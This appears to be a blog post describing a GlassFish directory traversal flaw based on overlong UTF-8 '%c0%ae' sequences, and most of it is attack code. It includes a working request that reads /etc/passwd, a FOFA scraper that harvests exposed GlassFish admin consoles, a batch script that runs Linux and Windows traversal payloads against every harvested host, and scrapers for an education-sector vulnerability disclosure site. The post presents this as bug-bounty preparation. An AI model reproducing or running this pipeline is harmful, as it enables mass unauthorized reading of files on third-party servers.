0x00 GlassFish Vulnerability Description
Vulnerability analysis:
GlassFish is a cross-platform, open-source application server written in Java.
Like wide-byte SQL injection, this flaw comes from ambiguous Unicode handling: the overlong UTF-8 sequence %c0%ae is decoded by the server as ".", so each %c0%ae%c0%ae/ segment becomes ../, letting a request walk out of the web root and read arbitrary files. The payload is constructed as follows:
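As a minimal sketch (the target host below is a placeholder for illustration only; the payload is the same Linux payload used by the PoC script in 0x02):
# Sketch of a single traversal request against the GlassFish admin console (port 4848,
# matching the FOFA query below). %c0%ae is an overlong UTF-8 encoding of '.', so each
# %c0%ae%c0%ae/ segment is decoded as ../ by the server.
import requests

target = 'http://192.168.1.1:4848'  # hypothetical host, replace with a real target
payload = '/theme/META-INF/' + '%c0%ae%c0%ae/' * 10 + 'etc/passwd'

r = requests.get(target + payload, timeout=10)
print(r.status_code)
print(r.text[:200])  # should start with the contents of /etc/passwd on a vulnerable host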
0x01 Batch Crawling Target IPs from FOFA
# -*- coding: utf-8 -*-
# @Time    : 2021/10/17 16:19
# @Author  : Hsy
# @File    : fofa-glassfish.paqu.py
# @Software: PyCharm
import requests
import base64
from lxml import etree
import time

search_data = '"glassfish" && port="4848"'
headers = {
    'cookie': 'your FOFA login cookie',
}
for yeshu in range(1, 6):
    url = 'https://fofa.so/result?page=' + str(yeshu) + '&qbase64='
    # FOFA expects the search expression base64-encoded in the qbase64 parameter
    search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
    urls = url + search_data_bs
    print(urls)
    try:
        print('Extracting page ' + str(yeshu))
        result = requests.get(urls, headers=headers).content
        soup = etree.HTML(result)
        # pull the target links out of the result list
        ip_data = soup.xpath('//span[@class="aSpan"]/a[@target="_blank"]/@href')
        ipdata = '\n'.join(ip_data)
        print(ip_data)
        with open(r'ip.txt', 'a+') as f:
            f.write(ipdata + '\n')
        time.sleep(0.5)
    except Exception as e:
        pass
Result:
0x02 Batch Vulnerability Verification
# -*- coding: utf-8 -*-
# @Time    : 2021/10/17 17:14
# @Author  : Hsy
# @File    : yanzhen-glassfish-poc.py
# @Software: PyCharm
import requests
import time

# overlong-UTF-8 directory traversal payloads for Linux and Windows targets
payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

for ip in open('ip.txt'):
    ip = ip.replace('\n', '')
    windows_url = ip + payload_windows
    linux_url = ip + payload_linux
    try:
        # timeout so unreachable hosts don't hang the scan
        vuln_code_l = requests.get(linux_url, timeout=10).status_code
        vuln_code_w = requests.get(windows_url, timeout=10).status_code
        print("check->" + ip)
        if vuln_code_l == 200 or vuln_code_w == 200:
            with open(r'vuln.txt', 'a+') as f:
                f.write(ip + '\n')
        time.sleep(0.5)
    except Exception as e:
        pass
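The script above treats any HTTP 200 as vulnerable, which can give false positives (for example, sites that answer every path with a 200 error page). A stricter variant, as a sketch, also requires a telltale marker in the response body; 'root:' and 'for 16-bit app support' are assumed markers for /etc/passwd and win.ini respectively:
# Sketch of a stricter check: require a known marker in the body, not just a 200 status.
import requests

def looks_vulnerable(base_url, payload, marker, timeout=10):
    """Return True if base_url + payload returns 200 and the body contains marker."""
    try:
        resp = requests.get(base_url + payload, timeout=timeout)
        return resp.status_code == 200 and marker in resp.text
    except requests.RequestException:
        return False

# Usage with the payloads defined above:
#   looks_vulnerable(ip, payload_linux, 'root:')
#   looks_vulnerable(ip, payload_windows, 'for 16-bit app support')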
Vulnerability verification:
Next step: batch-submit the findings to public-interest SRC platforms!
0x03 Crawling EDU Vulnerability Disclosures
Batch-crawl the vulnerability disclosures to prepare for later SRC hunting!
Crawler script 1:
import requests, time
from lxml import etree

def edu_list(page):
    for page in range(1, page + 1):
        try:
            url = 'https://src.sjtu.edu.cn/list/?page=' + str(page)
            data = requests.get(url).content
            # print(data)
            soup = etree.HTML(data.decode('utf-8'))
            # the disclosure titles sit in <td class=""><a> elements
            result = soup.xpath('//td[@class=""]/a/text()')
            # print(result)
            results = '\n'.join(result)
            resultss = results.split()
            print(resultss)
            for edu in resultss:
                with open(r'src.txt', 'a+', encoding='utf-8') as f:
                    f.write(edu + '\n')
        except Exception as e:
            time.sleep(0.5)
            pass

if __name__ == '__main__':
    edu_list(10)
Crawler script 2:
import requests
from lxml import etree

def src_tiqu(yeshu):
    # +1 so that asking for N pages actually crawls N pages
    for i in range(1, int(yeshu) + 1):
        url = 'https://src.sjtu.edu.cn/list/?page=' + str(i)
        print('Extracting -> page ' + str(i))
        data = requests.get(url).content
        # print(data.decode('utf-8'))  # debug output
        soup = etree.HTML(data)
        result = soup.xpath('//td[@class=""]/a/text()')
        results = '\n'.join(result)
        resultss = results.split()
        for edu in resultss:
            print(edu)
            with open(r'src_edu.txt', 'a+', encoding='utf-8') as f:
                f.write(edu + '\n')

if __name__ == '__main__':
    yeshu = input("How many pages do you want to crawl: ")
    src_tiqu(yeshu)
That wraps it up. This took some effort to put together, so please point out any problems you find, and a like from the masters would be much appreciated!
Contact and learning exchange:
Blog: www.kxsy.work
SND community: 告白热